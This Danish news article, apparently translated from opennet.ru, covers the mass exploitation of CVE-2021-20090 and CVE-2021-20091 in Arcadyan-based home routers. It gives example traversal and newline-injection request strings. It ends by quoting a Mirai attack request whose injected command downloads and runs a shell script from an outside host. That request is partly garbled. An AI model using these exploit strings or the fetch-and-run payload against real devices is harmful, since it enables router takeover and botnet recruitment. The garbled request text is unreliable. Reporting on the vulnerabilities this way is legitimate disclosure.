Et massivt angreb er blevet registreret på netværket mod hjemmeroutere, hvis firmware bruger en HTTP-serverimplementering fra Arcadyan-virksomheden. For at få kontrol over enheder bruges en kombination af to sårbarheder, der tillader fjernudførelse af vilkårlig kode med root-rettigheder. Problemet påvirker en temmelig bred vifte af ADSL-routere fra Arcadyan, ASUS og Buffalo, samt enheder leveret under Beeline-mærkerne (problemet er bekræftet i Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone og andre teleoperatører. Det bemærkes, at problemet har været til stede i Arcadyan firmware i mere end 10 år og i løbet af denne tid har formået at migrere til mindst 20 enhedsmodeller fra 17 forskellige producenter.
Den første sårbarhed, CVE-2021-20090, gør det muligt at få adgang til ethvert webgrænsefladescript uden godkendelse. Essensen af sårbarheden er, at i webgrænsefladen er nogle mapper, hvorigennem billeder, CSS-filer og JavaScript-scripts sendes, tilgængelige uden godkendelse. I dette tilfælde kontrolleres mapper, for hvilke adgang uden godkendelse er tilladt, ved hjælp af den indledende maske. Angivelse af "../"-tegn i stier for at gå til det overordnede bibliotek blokeres af firmwaren, men brug af "..%2f"-kombinationen springes over. Det er således muligt at åbne beskyttede sider, når du sender anmodninger som "http://192.168.1.1/images/..%2findex.htm".
Den anden sårbarhed, CVE-2021-20091, tillader en godkendt bruger at foretage ændringer i enhedens systemindstillinger ved at sende specielt udformede parametre til scriptet apply_abstract.cgi, som ikke kontrollerer for tilstedeværelsen af et linjeskifttegn i parametrene. For eksempel kan en angriber angive værdien "192.168.1.2%0AARC_SYS_TelnetdEnable=1" i IP-adressefeltet, når der udføres en ping-handling, og scriptet vil, når det opretter indstillingsfilen /tmp/etc/config/.glbcfg, skrive strengen "AARC_SYS_TelnetdEnable=1" ind i den, hvilket aktiverer server telnetd, som giver ubegrænset adgang til kommandoshellen med root-rettigheder. På samme måde kan enhver kode udføres på systemet ved at indstille parameteren AARC_SYS. Den første sårbarhed tillader, at det berørte script køres uden godkendelse ved at tilgå det som "/images/..%2fapply_abstract.cgi".
For at udnytte sårbarheder skal en angriber være i stand til at sende en anmodning til den netværksport, som webgrænsefladen kører på. At dømme efter dynamikken i spredningen af angrebet forlader mange operatører adgang på deres enheder fra det eksterne netværk for at forenkle diagnosticering af problemer af supporttjenesten. Hvis adgangen til grænsefladen kun er begrænset til det interne netværk, kan et angreb udføres fra et eksternt netværk ved hjælp af "DNS rebinding"-teknikken. Sårbarheder bliver allerede aktivt brugt til at forbinde routere til Mirai-botnettet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Forbindelse: luk User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Kilde: opennet.ru
